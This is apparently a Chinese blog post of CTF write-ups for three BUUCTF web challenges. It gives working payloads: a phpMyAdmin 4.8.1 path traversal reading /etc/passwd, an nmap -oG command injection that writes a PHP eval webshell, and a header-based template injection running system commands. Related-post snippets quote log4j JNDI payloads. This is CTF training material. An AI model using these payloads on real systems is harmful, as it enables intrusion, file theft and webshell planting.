BUU刷题Day3

最新推荐文章于 2024-11-09 07:44:51 发布
最新推荐文章于 2024-11-09 07:44:51 发布
阅读量2.4k 收藏
点赞数 4
分类专栏: buu刷题记录 文章标签: 安全 php web安全 mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45557476/article/details/123407073
版权

[GWCTF 2019]我有一个数据库

这题一看就不简单,进去一顿乱码看的我脑瓜子嗡嗡的,源码F12里面都没有提示

/robots.txt里面提示了phpinfo.php那就进去看了看,但是没有找到什么有用的,想起来这个名字是我有一个数据库,php+数据库 ---> phpmyadmin,去看看?真的可以,而且密码都没有,找了找啥也没找到,有点郁闷,搜了一下5.5.62版本的mysql的漏洞,啥也没有,于是秉着有phpmyadmin的原则去搜了一下phpmyadmin4.8.1的漏洞

我发现了phpmyadmin4.8.0-4.8.1存在漏洞

构造payload:

?target=db_datadict.php%253f/../../../../../../../../etc/passwd

拿flag--payload:

?target=db_datadict.php%253f/../../../../../../../../flag

总结:

要注意各个组件版本信息,搜索它本身就有的漏洞,这道题也让我想到了log4j,但是我没找到可以插入的地方就放弃了

[BUUCTF 2018]Online Tool

上来就是php代码,要审啦要审啦

GET传一个host参数,最后交给system执行nmap语句

中间运用了escapeshellarg和escapeshellcmd来进行过滤

  escapeshellarg
  1,确保用户值传递一个参数给命令
  2,用户不能指定更多的参数
  3,用户不能执行不同的命令
  ``/escapeshellcmd
  1,确保用户只执行一个命令
  2,用户可以指定不限数量的参数
  3,用户不能执行不同的命令

所以我们的思路就是构造payload使得它可以再完成部分的检测后最后执行最后一句的nmap命令,但是nmap有什么用呢?这时候我们就需要知道nmap的一个参数-oG可以实现将命令和结果写到文件,所以我们的思路就变成了利用-oG参数往网站里写一行一句话木马。

引用一下大佬的话:

1.传入的参数是:127.0.0.1' -v -d a=1

2.经过escapeshellarg处理后变成了'127.0.0.1''' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。

3.经过escapeshellcmd处理后变成'127.0.0.1'\'' -v -d a=1',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义

4.最后执行的命令是curl '127.0.0.1'\'' -v -d a=1',由于中间的\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 127.0.0.1\ -v -d a=1',即向127.0.0.1\发起请求,POST 数据为a=1'。

常见的rce思路用| & &&都不行,虽然我们通过这些操作逃过了单引号,但是escapeshellcmd会对特殊符号加上\来转义,但是我们之前说了,要用nmap的-oG参数,所以就直接写入一句话木马

payload:

?host=' <?php @eval($_POST["cmd"]);?> -oG shell.php '

总结:

rce里面也经常可以用到写马getshell,无回显的题也可以

学到了新的的函数!!!

[BJDCTF2020]The mystery of ip

这个题进来后就可以看到hint和flag,我以为就这样结束的时候我才发现我是这么的天真,他只是给了个ip

hint的源代码里有一行注释是你知道我为什么知道你的IP吗?,那我就抓你包看一看!

抓包没抓到什么有用的东西,但是我想到了X-Forwarded-For:可以修改来源,那我们就试一试。果然可以!

然后我就试着写个一句话进去看一看

写是写了,也可以显示,但是就是没有存入flag.php,恼火啊 !

那就试试rce,能不能执行系统命令!

可以!,那我们拿flag就逃吧!

payload:

{system("cat /f*")}

总结:

复习了一下X-Forwarded-For:

X-Forwarded-For 是一个扩展头。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP,现在已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中.

X-Real-IP 是一个自定义头。X-Real-Ip 通常被 HTTP 代理用来表示与它产生 TCP 连接的设备 IP,这个设备可能是其他代理,也可能是真正的请求端。需要注意的是,X-Real-Ip 目前并不属于任何标准,代理和 Web 应用之间可以约定用任何自定义头来传递这个信息

$remote_addr 是nginx与客户端进行TCP连接过程中,获得的客户端真实地址. Remote Address 无法伪造,因为建立 TCP 连接需要三次握手,如果伪造了源 IP,无法建立 TCP 连接,更不会有后面的 HTTP 请求

感谢buu提供优质题目,感谢勤劳的自己

姜小孩.
关注
专栏目录
sping-boot log4j2小实验
weixin_51566416的博客
12-14 991
最近刷屏的超级漏洞log4j2,复现难度不大,没接触java的同学花点时间上手下,buuctf和bugku两个ctf平台上都出了题,可以刷下。 条件:需要一台可公网访问的机器(比如云服务器)BUUCTF在线评测跳转提示 那么log4j是什么呢? Log4j是Apache的一个开源项目(但并不是),通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息
buu刷题记录
missht0的博客
01-18 858
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')
ctfshow—webLog4j复现
HAI_WD的博客
09-03 542
利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho}这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。log4j的payload是:${jndi:ldap://}这里选取的工具是:JNDIExploit。
BUUCTF-Real
weixin_43821278的博客
03-08 5019
BUUCTF-Real
ctf bugku Apache Log4j2 RCE解题
YouthBelief的博客
03-08 4484
0x00 环境准备 工具地址 https://github.com/welk1n/JNDI-Injection-Exploit 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html dnslog地址 http://www.dnslog.cn/ 0x01 工具配置 $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
3. **分析操作码**:理解WASM指令集,识别关键操作,比如内存访问、算术运算、条件判断等。 4. **跟踪数据流**:追踪变量的分配和使用,找出可能的解密或计算过程。 5. **交互调试**:如果可能,使用像Emscripten...
buu刷题1.3
ooooohhhhhhh博客
10-28 2062
1.3.1Warmup(web) 打开网站发现如下页面 查看源码,发现有source.php查看一下 发现hint.php,查看一下,显示这个,说flag在ffffllllaaaagggg里面 只能回到前面去分析source.php 先分析最后一个if,当最后一个if满足条件时,才能对文件进行包含 if(!empty($_REQUEST['file'])&&is_string($_REQUEST['file'])...
BUU刷题 easy_heap
清霂的博客
05-13 248
目录easyheapmagicheapciscn_2019_n_3 easyheap #!/usr/bin/env python2 # coding=utf-8 from pwn import * arch = "amd64" filename = "easyheap" context(os="linux", arch=arch, log_level="debug") content = 1 offset = 0 # elf elf = ELF(filename) fake_heap_addr=0x6
BUU刷题记录②
Sapphire037的博客
08-24 331
[FBCTF2019]RCEService 不会做,看了wp不知道哪来的源码,用json格式传,知识点就是绕过preg_match的方法,回溯,数组(这题没用),换行符%0A [Zer0pts2020]Can you guess it? 进入页面得到源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
ctfshow log4j复现 wp|CVE-2021-44228
spring!
03-24 4746
ctfshow log4j复现 wp|CVE-2021-44228
[Log4j]CVE-2021-44228 CTFshow
krysyal的博客
03-31 3628
Log4j复现 CTFshow 复现参考文档1 复现参考文档2 环境 http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/ 2.0 <= Apache log4j2 <= 2.14.1 简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。 jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式
buuctf 刷题记录 模板注入
SopRomeo的博客
01-16 912
查看源代码发现三个txt进入的格式是这样的 把filename改为/fllllllllllllag emmmmm,点其他连个看看 有思路了重点就是求出这个cookie_secret 作为一个菜鸡,百度tornado 然后了解到了模板注入(配上网址https://www.jianshu.com/p/aef2ae0498df) render是一个类似模板的东西,可以使用不同的参数来访问网页...
BUUCTF刷题笔记
追求卓越,技术流~
03-24 6912
BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1‘,看看返回的结果 返回结果说明这个是字符型的SQL注入 下面我们来进行一下注释 发现是这个结果,所以肯定了我们的猜测 下面要进行的是对其中的列进行爆破 输入: 1' order by 3 # 可以看到再其中没有or 我们采取的是对其进行重复的拼写进行绕过后台过滤 输入: 1’ oorrder by 3#`
掌控者-封神台-Apache Log4j任意代码执行复现
weixin_43821278的博客
04-06 5812
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结 一、工具 JNDIExploit-1.2-SNAPSHOT.jar 二、靶场 看网页源码 猜测就是username和password为注入点 三、步骤 vps有java环境 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP 成功运行 向密码框填入${jndi:ldap://vps的IP:1389/Basic/Comm.
【网络】深入理解 HTTPS:确保数据传输安全的核心协议
人生苦短,睡觉要紧,睡醒再说
11-06 1717
HTTPS(HyperText Transfer Protocol Secure)是 HTTP 协议的安全版本。HTTP 是用于客户端与服务器之间传输网页数据的协议,而 HTTPS 在 HTTP 协议的基础上添加了一层SSL/TLS加密协议,使得传输的数据在网络中不易被窃取或篡改。HTTPS 通常用于传输敏感信息,如登录凭证、支付信息、个人数据等。与 HTTP 协议不同,HTTPS 在数据传输过程中会对信息进行加密,确保数据在传输过程中不被第三方监听或修改。
关于Flutter空安全升级方案整理
清风洒脱
11-08 965
Flutter 从 2.0 版本开始支持空安全(Null Safety)。升级到空安全后,由于语法的变动,基本上整个工程,代码都爆红,这对项目来说简直是灾难性的打击,不升级的话只是缓兵之计,因为随着时间的推移,flutter将不再维护非空安全的版本,同时一些三方库也将无法使用,因此空安全升级变成了一个不得不做的事情,项目越复杂需要的时间也就越持久,考虑到对项目的稳定性,和开发周期。选择一个合适自己项目的迁移方案非常重要。下面自己会讲下自己对空安全迁移的理解和实施方案,目前成功迁移几个项目,还是比较有经验的。
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
最新发布
weixin_46641057的博客
11-09 1454
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 463
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

姜小孩.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值